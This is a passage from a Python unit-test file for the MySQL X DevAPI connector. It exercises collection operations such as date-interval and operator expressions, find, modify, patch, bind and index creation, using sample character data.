result = collection.find().fields("$.adate - interval 1 year = "
"'1999-01-01' as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '3.1000000' "
"second_microsecond = '2000-01-01 "
"12:00:05' as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '1:1.1' "
"minute_microsecond = "
"'2000-01-01 12:01:02.100000' "
"as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval "
"'1:1' minute_second "
"= '2000-01-01 12:01:02'"
" as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '1:1:1.1' "
"hour_microsecond = "
"'2000-01-01 13:01:02.100000'"
" as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '1:1:1' "
"hour_second = '2000-01-01 13:01:02'"
" as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '1:1' "
"hour_minute = '2000-01-01 13:01:01'"
" as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval "
"'2 3:4:5.600' day_microsecond = "
"'2000-01-03 15:04:06.600000'"
" as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '2 3:4:5' "
"day_second = '2000-01-03 15:04:06' "
"as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '2 3:4' "
"day_minute = '2000-01-03 15:04:01' "
"as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval '2 3' "
"day_hour = '2000-01-03 15:00:01' "
"as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adate + interval '2-3' "
"year_month = "
"'2002-04-01' as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
self.schema.drop_collection(collection_name)
def test_bitwise_operators(self):
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
result = collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
# &
result = collection.find("$.age = 21") \
.fields("$.age & 1 as test").execute()
self.assertEqual(1, result.fetch_all()[0]["test"])
# |
result = collection.find("$.age == 21") \
.fields("0 | 1 as test").execute()
self.assertEqual(1, result.fetch_all()[0]["test"])
# ^
result = collection.find("$.age = 21") \
.fields("$.age ^ 1 as test").execute()
self.assertEqual(20, result.fetch_all()[0]["test"])
# <<
result = collection.find("$.age == 21") \
.fields("1 << 2 as test").execute()
self.assertEqual(4, result.fetch_all()[0]["test"])
# >>
result = collection.find("$.age == 21") \
.fields("4 >> 2 as test").execute()
self.assertEqual(1, result.fetch_all()[0]["test"])
self.schema.drop_collection(collection_name)
def test_numeric_operators(self):
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
# =
result = collection.find("$.age = 21").execute()
self.assertEqual(1, len(result.fetch_all()))
# ==
result = collection.find("$.age == 21").execute()
self.assertEqual(1, len(result.fetch_all()))
# &&
result = collection.find("$.age == 21 && $.name == 'Fred'").execute()
self.assertEqual(1, len(result.fetch_all()))
# and
result = collection.find("$.age == 21 and $.name == 'Fred'").execute()
self.assertEqual(1, len(result.fetch_all()))
# or
result = collection.find("$.age == 21 or $.age == 42").execute()
self.assertEqual(2, len(result.fetch_all()))
# ||
result = collection.find("$.age == 21 || $.age == 42").execute()
self.assertEqual(2, len(result.fetch_all()))
# xor
result = collection.find().fields("$.age xor 1 as test").execute()
docs = result.fetch_all()
self.assertTrue(all([i["test"] is False for i in docs]))
# !=
result = collection.find("$.age != 21").execute()
self.assertEqual(3, len(result.fetch_all()))
# <>
result = collection.find("$.age <> 21").execute()
self.assertEqual(3, len(result.fetch_all()))
# >
result = collection.find("$.age > 28").execute()
self.assertEqual(2, len(result.fetch_all()))
# >=
result = collection.find("$.age >= 28").execute()
self.assertEqual(3, len(result.fetch_all()))
# <
result = collection.find("$.age < 28").execute()
self.assertEqual(1, len(result.fetch_all()))
# <=
result = collection.find("$.age <= 28").execute()
self.assertEqual(2, len(result.fetch_all()))
# +
result = collection.find("$.age == 21") \
.fields("$.age + 10 as test").execute()
self.assertEqual(31, result.fetch_all()[0]["test"])
# -
result = collection.find("$.age == 21") \
.fields("$.age - 10 as test").execute()
self.assertEqual(11, result.fetch_all()[0]["test"])
# *
result = collection.find("$.age == 21") \
.fields("$.age * 10 as test").execute()
self.assertEqual(210, result.fetch_all()[0]["test"])
# /
result = collection.find("$.age == 21") \
.fields("$.age / 7 as test").execute()
self.assertEqual(3, result.fetch_all()[0]["test"])
# div
result = collection.find("$.age == 21") \
.fields("$.age div 7 as test").execute()
self.assertEqual(3, result.fetch_all()[0]["test"])
# %
result = collection.find("$.age == 21") \
.fields("$.age % 7 as test").execute()
self.assertEqual(0, result.fetch_all()[0]["test"])
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"id field creation on server side is required.")
def test_get_generated_ids(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
result = collection.add({"name": "Fred", "age": 21}).execute()
self.assertTrue(result.get_generated_ids() is not None)
result = collection.add(
{"name": "Fred", "age": 21},
{"name": "Barney", "age": 45}).execute()
self.assertEqual(2, len(result.get_generated_ids()))
self.schema.drop_collection(collection_name)
def test_remove(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 45},
{"_id": "3", "name": "Wilma", "age": 42}
).execute()
self.assertEqual(3, collection.count())
result = collection.remove("age == 21").execute()
self.assertEqual(1, result.get_affected_items_count())
self.assertEqual(2, collection.count())
# Collection.remove() is not allowed without a condition
result = collection.remove(None)
self.assertRaises(mysqlx.ProgrammingError, result.execute)
result = collection.remove("")
self.assertRaises(mysqlx.ProgrammingError, result.execute)
self.assertRaises(mysqlx.ProgrammingError, collection.remove, " ")
self.schema.drop_collection(collection_name)
def _assert_flat_line(self, samples, tolerance):
for sample in range(1, len(samples)):
self.assertLessEqual(samples[sample] - tolerance,
samples[sample - 1], "For sample {} Objects "
"{} overpass the tolerance () from previews "
"sample {}".format(sample, samples[sample],
tolerance,
samples[sample - 1]))
def _collect_samples(self, sample_size, funct, param):
samples = [0] * sample_size
for num in range(sample_size * 10):
_ = funct(eval(param)).execute()
if num % 10 == 0:
samples[int(num / 10)] = len(gc.get_objects())
return samples
def test_memory_use_in_sequential_calls(self):
"Tests the number of new open objects in sequential usage"
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
sample_size = 100
param = '{"_id": "{}".format(num), "name": repr(num), "number": num}'
add_samples = self._collect_samples(sample_size, collection.add,
param)
param = '\'$.name == "{}"\'.format(num)'
find_samples = self._collect_samples(sample_size, collection.find,
param)
# The tolerance here is the number of new objects that can be created
# on each sequential method invocation without exceed memory usage.
tolerance = 12
self._assert_flat_line(add_samples, tolerance)
self._assert_flat_line(find_samples, tolerance)
self.schema.drop_collection(collection_name)
def test_bind(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
# Empty bind should not be allowed
find = collection.find("$.age == :age")
self.assertRaises(mysqlx.ProgrammingError, find.bind)
# Invalid arguments to bind
find = collection.find("$.age == :age")
self.assertRaises(mysqlx.ProgrammingError, find.bind, 21, 28, 42)
# Bind with a dictionary
result = collection.find("$.age == :age").bind({"age": 67}).execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual("Betty", docs[0]["name"])
# Bind with a JSON string
result = collection.find("$.age == :age").bind('{"age": 42}').execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual("Wilma", docs[0]["name"])
result = collection.find("$.age == :age").bind("age", 28).execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual("Barney", docs[0]["name"])
self.schema.drop_collection(collection_name)
def test_find(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result = collection.find("$.age == 67").execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual("Betty", docs[0]["name"])
result = \
collection.find("$.age > 28").sort("age DESC, name ASC").execute()
docs = result.fetch_all()
self.assertEqual(2, len(docs))
self.assertEqual(67, docs[0]["age"])
result = \
collection.find().fields("age").sort("age DESC").limit(2).execute()
docs = result.fetch_all()
self.assertEqual(2, len(docs))
self.assertEqual(42, docs[1]["age"])
self.assertEqual(1, len(docs[1].keys()))
# test flexible params
result = collection.find("$.age > 28")\
.sort(["age DESC", "name ASC"]).execute()
docs = result.fetch_all()
self.assertEqual(2, len(docs))
self.assertEqual(67, docs[0]["age"])
# test flexible params
result = collection.find().fields(["age"])\
.sort("age DESC").limit(2).execute()
docs = result.fetch_all()
self.assertEqual(2, len(docs))
self.assertEqual(42, docs[1]["age"])
self.assertEqual(1, len(docs[1].keys()))
# test like operator
result = collection.find("$.name like 'B%'").execute()
docs = result.fetch_all()
self.assertEqual(2, len(docs))
# test aggregation functions without alias
result = collection.find().fields("sum($.age)").execute()
docs = result.fetch_all()
self.assertTrue("sum($.age)" in docs[0].keys())
self.assertEqual(158, docs[0]["sum($.age)"])
# test operators without alias
result = collection.find().fields("$.age + 100").execute()
docs = result.fetch_all()
self.assertTrue("$.age + 100" in docs[0].keys())
# tests comma seperated fields
result = collection.find("$.age = 21").fields("$.age, $.name").execute()
docs = result.fetch_all()
self.assertEqual("Fred", docs[0]["$.name"])
# test limit and offset
result = collection.find().fields("$.name").limit(2).offset(2).execute()
docs = result.fetch_all()
self.assertEqual(2, len(docs))
self.assertEqual("Wilma", docs[0]["$.name"])
self.assertEqual("Betty", docs[1]["$.name"])
self.assertRaises(ValueError, collection.find().limit, -1)
self.assertRaises(ValueError, collection.find().limit(1).offset, -1)
# test unread result found
find = collection.find()
find.execute()
find.execute()
result = find.execute()
docs = result.fetch_all()
self.assertEqual(4, len(docs))
self.schema.drop_collection(collection_name)
def test_modify(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result = collection.modify("age < 67").set("young", True).execute()
self.assertEqual(3, result.get_affected_items_count())
doc = collection.find("name = 'Fred'").execute().fetch_all()[0]
self.assertEqual(True, doc.young)
result = \
collection.modify("age == 28").change("young", False).execute()
self.assertEqual(1, result.get_affected_items_count())
docs = collection.find("young = True").execute().fetch_all()
self.assertEqual(2, len(docs))
result = collection.modify("young == True").unset("young").execute()
self.assertEqual(2, result.get_affected_items_count())
docs = collection.find("young = True").execute().fetch_all()
self.assertEqual(0, len(docs))
# test flexible params
result = collection.modify("TRUE").unset(["young"]).execute()
self.assertEqual(1, result.get_affected_items_count())
# Collection.modify() is not allowed without a condition
result = collection.modify(None).unset(["young"])
self.assertRaises(mysqlx.ProgrammingError, result.execute)
result = collection.modify("").unset(["young"])
self.assertRaises(mysqlx.ProgrammingError, result.execute)
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 4), "Unavailable")
def test_modify_patch(self):
collection_name = "collection_GOT"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Bran", "family_name": "Stark", "age": 18,
"actors_bio": {"bd": "1999 April 9", "rn": "Isaac Hempstead"},
"parents": ["Eddard Stark", "Catelyn Stark"]},
{"_id": "2", "name": "Sansa", "family_name": "Stark", "age": 21,
"actors_bio": {"bd": "1996 February 21",
"rn": "Sophie Turner"},
"parents": ["Eddard Stark", "Catelyn Stark"]},
{"_id": "3", "name": "Arya", "family_name": "Stark", "age": 20,
"actors_bio": {"bd": "1997 April 15",
"rn": "Maisie Williams"},
"parents": ["Eddard Stark", "Catelyn Stark"]},
{"_id": "4", "name": "Jon", "family_name": "Snow", "age": 30,
"actors_bio": {"bd": "1986 December 26",
"rn": "Kit Harington"}, },
{"_id": "5", "name": "Daenerys", "family_name": "Targaryen",
"age": 30, "actors_bio": {"bd": "1986 October 23",
"rn": "Emilia Clarke"}, },
{"_id": "6", "name": "Margaery", "family_name": "Tyrell",
"age": 35, "actors_bio": {"bd": "1982 February 11",
"rn": "Natalie Dormer"}, },
{"_id": "7", "name": "Cersei", "family_name": "Lannister",
"age": 44, "actors_bio": {"bd": "1973 October 3",
"rn": "Lena Headey"},
"parents": ["Tywin Lannister, Joanna Lannister"]},
{"_id": "8", "name": "Tyrion", "family_name": "Lannister",
"age": 48, "actors_bio": {"bd": "1969 June 11",
"rn": "Peter Dinklage"},
"parents": ["Tywin Lannister, Joanna Lannister"]},
).execute()
# test with empty document
result = collection.modify("TRUE").patch('{}').execute()
self.assertEqual(0, result.get_affected_items_count())
# Test addition of new attribute
result = collection.modify("age <= 21").patch(
'{"status": "young"}').execute()
self.assertEqual(3, result.get_affected_items_count())
doc = collection.find("name = 'Bran'").execute().fetch_all()[0]
self.assertEqual("young", doc.status)
doc = collection.find("name = 'Sansa'").execute().fetch_all()[0]
self.assertEqual("young", doc.status)
doc = collection.find("name = 'Arya'").execute().fetch_all()[0]
self.assertEqual("young", doc.status)
result = collection.modify("age > 21").patch(
'{"status": "older"}').execute()
self.assertEqual(5, result.get_affected_items_count())
doc = collection.find("name = 'Jon'").execute().fetch_all()[0]
self.assertEqual("older", doc.status)
doc = collection.find("name = 'Cersei'").execute().fetch_all()[0]
self.assertEqual("older", doc.status)
doc = collection.find("name = 'Tyrion'").execute().fetch_all()[0]
self.assertEqual("older", doc.status)
doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
self.assertEqual("older", doc.status)
doc = collection.find("name = 'Margaery'").execute().fetch_all()[0]
self.assertEqual("older", doc.status)
# Test addition of new attribute with array value
result = collection.modify('family_name == "Tyrell"').patch(
{"parents": ["Mace Tyrell", "Alerie Tyrell"]}).execute()
self.assertEqual(1, result.get_affected_items_count())
doc = collection.find("name = 'Margaery'").execute().fetch_all()[0]
self.assertEqual(
["Mace Tyrell", "Alerie Tyrell"],
doc.parents)
result = collection.modify('name == "Jon"').patch(
'{"parents": ["Lyanna Stark and Rhaegar Targaryen"], '
'"bastard":null}').execute()
self.assertEqual(1, result.get_affected_items_count())
doc = collection.find("name = 'Jon'").execute().fetch_all()[0]
self.assertEqual(
["Lyanna Stark and Rhaegar Targaryen"],
doc.parents)
# Test update of attribute with array value
result = collection.modify('name == "Jon"').patch(
'{"parents": ["Lyanna Stark", "Rhaegar Targaryen"], '
'"bastard":null}').execute()
self.assertEqual(1, result.get_affected_items_count())
doc = collection.find("name = 'Jon'").execute().fetch_all()[0]
self.assertEqual(
["Lyanna Stark", "Rhaegar Targaryen"],
doc.parents)
# Test add and update of a nested attribute with doc value
result = collection.modify('name == "Daenerys"').patch('''
{"dragons":{"drogon": "black with red markings",
"Rhaegal": "green with bronze markings",
"Viserion": "creamy white, with gold markings"}}
''').execute()
self.assertEqual(1, result.get_affected_items_count())
doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
self.assertEqual(
{"drogon": "black with red markings",
"Rhaegal": "green with bronze markings",
"Viserion": "creamy white, with gold markings"},
doc.dragons)
# test remove attribute by seting it with null value.
result = collection.modify("TRUE").patch('{"status": null}').execute()
self.assertEqual(8, result.get_affected_items_count())
# Test remove a nested attribute with doc value
result = collection.modify('name == "Daenerys"').patch(
{"dragons": {"drogon": "black with red markings",
"Rhaegal": "green with bronze markings",
"Viserion": None}}
).execute()
self.assertEqual(1, result.get_affected_items_count())
doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
self.assertEqual(
{"drogon": "black with red markings",
"Rhaegal": "green with bronze markings"},
doc.dragons)
# Test add new attribute using expression
result = collection.modify('name == "Daenerys"').patch(mysqlx.expr(
'JSON_OBJECT("dragons", JSON_OBJECT("count", 3))'
)).execute()
self.assertEqual(1, result.get_affected_items_count())
doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
self.assertEqual(
{"drogon": "black with red markings",
"Rhaegal": "green with bronze markings",
"count": 3},
doc.dragons)
# Test update attribute value using expression
result = collection.modify('name == "Daenerys"').patch(mysqlx.expr(
'JSON_OBJECT("dragons",'
' JSON_OBJECT("count", $.dragons.count - 1))')).execute()
self.assertEqual(1, result.get_affected_items_count())
doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
self.assertEqual(
{"drogon": "black with red markings",
"Rhaegal": "green with bronze markings",
"count": 2},
doc.dragons)
# Test update attribute value using expression without JSON functions
result = collection.modify('TRUE').patch(mysqlx.expr(
'{"actors_bio": {"current": {"day_of_birth": CAST(SUBSTRING_INDEX('
' $.actors_bio.bd, " ", - 1) AS DECIMAL)}}}')).execute()
self.assertEqual(8, result.get_affected_items_count())
# Test update attribute value using mysqlx.expr
result = collection.modify('TRUE').patch(
{"actors_bio": {"current": {
"birth_age": mysqlx.expr(
'CAST(SUBSTRING_INDEX($.actors_bio.bd, " ", 1)'
' AS DECIMAL)')}}
}).execute()
self.assertEqual(8, result.get_affected_items_count())
doc = collection.find(
"actors_bio.rn = 'Maisie Williams'").execute().fetch_all()[0]
self.assertEqual(
{"bd": "1997 April 15",
"current": {'day_of_birth': 15, 'birth_age': 1997},
"rn": "Maisie Williams"},
doc.actors_bio)
# Test update attribute value using mysqlx.expr extended without '()'
result = collection.modify('TRUE').patch(
{"actors_bio": {"current": {
"age": mysqlx.expr(
'CAST(Year(CURDATE()) - '
'SUBSTRING_INDEX($.actors_bio.bd, " ", 1) AS DECIMAL)')}}
}).execute()
self.assertEqual(8, result.get_affected_items_count())
res = self.session.sql("select Year(CURDATE()) - 1997").execute()
age = res.fetch_all()[0]["Year(CURDATE()) - 1997"]
doc = collection.find(
"actors_bio.rn = 'Maisie Williams'").execute().fetch_all()[0]
self.assertEqual(
{"bd": "1997 April 15",
"current": {'age': age, 'day_of_birth': 15, 'birth_age': 1997},
"rn": "Maisie Williams"},
doc.actors_bio)
# test use of year funtion.
result = collection.modify('TRUE').patch(mysqlx.expr(
'{"actors_bio": {"current": {"last_update": Year(CURDATE())}}}'
)).execute()
self.assertEqual(8, result.get_affected_items_count())
# Collection.modify() is not allowed without a condition
result = collection.modify(None).patch('{"status":"alive"}')
self.assertRaises(mysqlx.ProgrammingError, result.execute)
result = collection.modify("").patch('{"status":"alive"}')
self.assertRaises(mysqlx.ProgrammingError, result.execute)
# Collection.modify().patch() is not allowed without a document
result = collection.modify("TRUE").patch('')
self.assertRaises(mysqlx.OperationalError, result.execute)
result = collection.modify("TRUE").patch(None)
self.assertRaises(mysqlx.OperationalError, result.execute)
# Collection.modify().patch() must fail is parameter is other
# than DBdoc, dict or str.
self.assertRaises(mysqlx.ProgrammingError,
collection.modify("TRUE").patch, {"a_set"})
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 3),
"Root level updates not supported")
def test_replace_one(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result = collection.find("age = 21").execute().fetch_one()
self.assertEqual("Fred", result["name"])
result['name'] = "George"
collection.replace_one(result["_id"], result)
result = collection.find("age = 21").execute().fetch_one()
self.assertEqual("George", result["name"])
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 2), "Upsert not supported")
def test_add_or_replace_one(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result = collection.find("age = 21").execute().fetch_one()
self.assertEqual("Fred", result["name"])
result['name'] = "George"
collection.add_or_replace_one(result["_id"], result)
result = collection.find("age = 21").execute().fetch_one()
self.assertEqual("George", result["name"])
result = collection.find("_id = 'new_id'").execute().fetch_all()
self.assertEqual(0, len(result))
upsert = {"_id": "11", 'name': 'Melissandre', "age": 99999}
collection.add_or_replace_one("new_id", upsert)
result = collection.find("age = 99999").execute().fetch_one()
self.assertEqual("Melissandre", result["name"])
self.assertEqual("new_id", result["_id"])
self.schema.drop_collection(collection_name)
def test_get_one(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result = collection.find("name = 'Fred'").execute().fetch_one()
result = collection.get_one(result["_id"])
self.assertEqual("Fred", result["name"])
self.schema.drop_collection(collection_name)
def test_remove_one(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result = collection.find("name = 'Fred'").execute().fetch_one()
result = collection.remove_one(result["_id"])
result = collection.find("name = 'Fred'").execute().fetch_all()
self.assertEqual(0, len(result))
self.schema.drop_collection(collection_name)
def test_results(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result1 = collection.find().execute()
# now do another collection find.
# the first one will have to be transparently buffered
result2 = collection.find("age > 28").sort("age DESC").execute()
docs2 = result2.fetch_all()
self.assertEqual(2, len(docs2))
self.assertEqual("Betty", docs2[0]["name"])
docs1 = result1.fetch_all()
self.assertEqual(4, len(docs1))
result3 = collection.find("age > 28").sort("age DESC").execute()
self.assertEqual("Betty", result3.fetch_one()["name"])
self.assertEqual("Wilma", result3.fetch_one()["name"])
self.assertEqual(None, result3.fetch_one())
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 4), "Dev API change")
def test_create_index(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
# Create index with single field
index_name = "age_idx"
result = collection.create_index(index_name,
{"fields": [{"field": "$.age",
"type": "INT",
"required": True}],
"unique": True})
# Unique indexes are not supported
self.assertRaises(mysqlx.NotSupportedError, result.execute)
collection.create_index(index_name,
{"fields": [{"field": "$.age", "type": "INT",
"required": True}],
"unique": False}).execute()
result = self.session.sql(_SHOW_INDEXES_QUERY.format(
self.schema_name, collection_name, index_name)).execute()
rows = result.fetch_all()
self.assertEqual(1, len(rows))
# Create index with multiple fields
index_name = "streets_idx"
collection.create_index(index_name,
{"fields": [{"field": "$.street",
"type": "TEXT(15)",
"required": True},
{"field": "$.cross_street",
"type": "TEXT(15)",
"required": True}],
"unique": False}).execute()
result = self.session.sql(_SHOW_INDEXES_QUERY.format(
self.schema_name, collection_name, index_name)).execute()
rows = result.fetch_all()
self.assertEqual(2, len(rows))
# Create index using a geojson datatype
index_name = "geo_idx"
collection.create_index(index_name,
{"fields": [{"field": '$.myGeoJsonField',
"type": 'GEOJSON',
"required": True,
"options": 2,
"srid": 4326}],
"unique": False,
"type":'SPATIAL'}).execute()
result = self.session.sql(_SHOW_INDEXES_QUERY.format(
self.schema_name, collection_name, index_name)).execute()
rows = result.fetch_all()
self.assertEqual(1, len(rows))
# Create an index on document fields which contain arrays
index_name = "emails_idx"
index_desc = {"fields": [{"field": "$.emails", "type": "CHAR(128)",
"array": True}]}
collection.create_index(index_name, index_desc).execute()
result = self.session.sql(_SHOW_INDEXES_QUERY.format(
self.schema_name, collection_name, index_name)).execute()
rows = result.fetch_all()
self.assertEqual(1, len(rows))
# Error conditions
# Index name can not be None
index_name = None
index_desc = {"fields": [{"field": "$.myField", "type": "TEXT(10)"}],
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# Index name can not be invalid identifier
index_name = "!invalid"
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
index_name = "invalid()"
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
index_name = "01invalid"
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# index descriptor wrong format
# Required "fields" is missing
index_name = "myIndex"
index_desc = {"fields1": [{"field": "$.myField", "type": "TEXT(10)"}],
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
index_desc = {"field": [{"field": "$.myField", "type": "TEXT(10)"}],
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# index type with invalid type
index_desc = {"field": [{"field": "$.myField", "type": "TEXT(10)"}],
"unique": False, "type":"Invalid"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# index description contains aditional fields
index_desc = {"field": [{"field": "$.myField", "type": "TEXT(10)"}],
"unique": False, "other":"value"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# Inner "field" value is not a list
index_desc = {"fields": "$.myField",
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# Required inner "field" is missing
index_desc = {"fields": [{}],
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# Required inner "field" is misstyped
index_desc = {"fields": [{"field1": "$.myField", "type": "TEXT(10)"}],
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# Required inner "field" is misstyped
index_desc = {"fields": [{"01field1": "$.myField",
"type": "TEXT(10)"}],
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# Required inner "field.type" is missing
index_desc = {"fields": [{"field": "$.myField"}], "unique": False,
"type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# Required inner "field.type" is invalid
index_desc = {"fields": [{"field": "$.myField", "type": "invalid"}],
"unique": False, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.OperationalError, create_index.execute)
# By current Server limitations, "unique" can ont be True
index_desc = {"fields": [{"field": "$.myField", "type": "TEXT(10)"}],
"unique": True, "type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.NotSupportedError, create_index.execute)
# index specifiying the 'collation' option for non TEXT data type
index_desc = {"fields": [{"field": "$.myField", "type": "int",
"collation": "utf8_general_ci"}],
"type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# member description contains aditional fields
index_desc = {"fields": [{"field": "$.myField", "type": "int",
"additional": "field"}],
"type":"INDEX"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# index type SPATIAL requires inner required field to be True
index_name = "geotrap"
index_desc = {"fields": [{"field": "$.intField", "type": "INT",
"required": True},
{"field": "$.floatField", "type": "FLOAT",
"required": True},
{"field": "$.dateField", "type": "DATE"},
{"field": "$.geoField", "type": "GEOJSON",
"required": False, "options": 2,
"srid": 4326}], "type" : "SPATIAL"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# inner field type GEOJSON requires index type set to SPATIAL
index_desc = {"fields": [{"field": "$.intField", "type": "INT",
"required": True},
{"field": "$.floatField", "type": "FLOAT",
"required": True},
{"field": "$.dateField", "type": "DATE"},
{"field": "$.geoField", "type": "GEOJSON",
"required": False, "options": 2,
"srid": 4326}], "type" : "SPATIAL"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# "srid" fields can be present only if "type" is set to "GEOJSON"
index_desc = {"fields": [{"field": "$.NogeoField", "type": "int",
"required": True, "srid": 4326}],
"type" : "SPATIAL"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
# "options" fields can be present only if "type" is set to "GEOJSON"
index_desc = {"fields": [{"field": "$.NogeoField", "type": "int",
"required": True, "options": 2}],
"type" : "SPATIAL"}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
